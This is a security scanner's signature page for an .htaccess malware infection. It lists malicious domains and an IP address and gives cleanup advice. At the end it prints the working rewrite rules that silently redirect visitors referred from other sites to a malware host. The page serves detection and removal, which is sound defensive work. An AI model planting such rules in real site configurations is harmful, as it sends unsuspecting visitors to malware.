SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-g-oogl-e-com

malware-entry-g-oogl-e-com

Description:
This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from (91.201.66.38):

12583497154.ru
6846183415.ru
g-oogl-e.com
uploadfriends2010.ru

Affecting:
Any type of web site (no specific target).

Clean up and details:
Remove offending code from .htaccess and/or index.php.

Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
http://sucuri.net/malware/malware-entry-mwhta7

Malware dump:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://g-oogl-e.com/%{REMOTE_ADDR}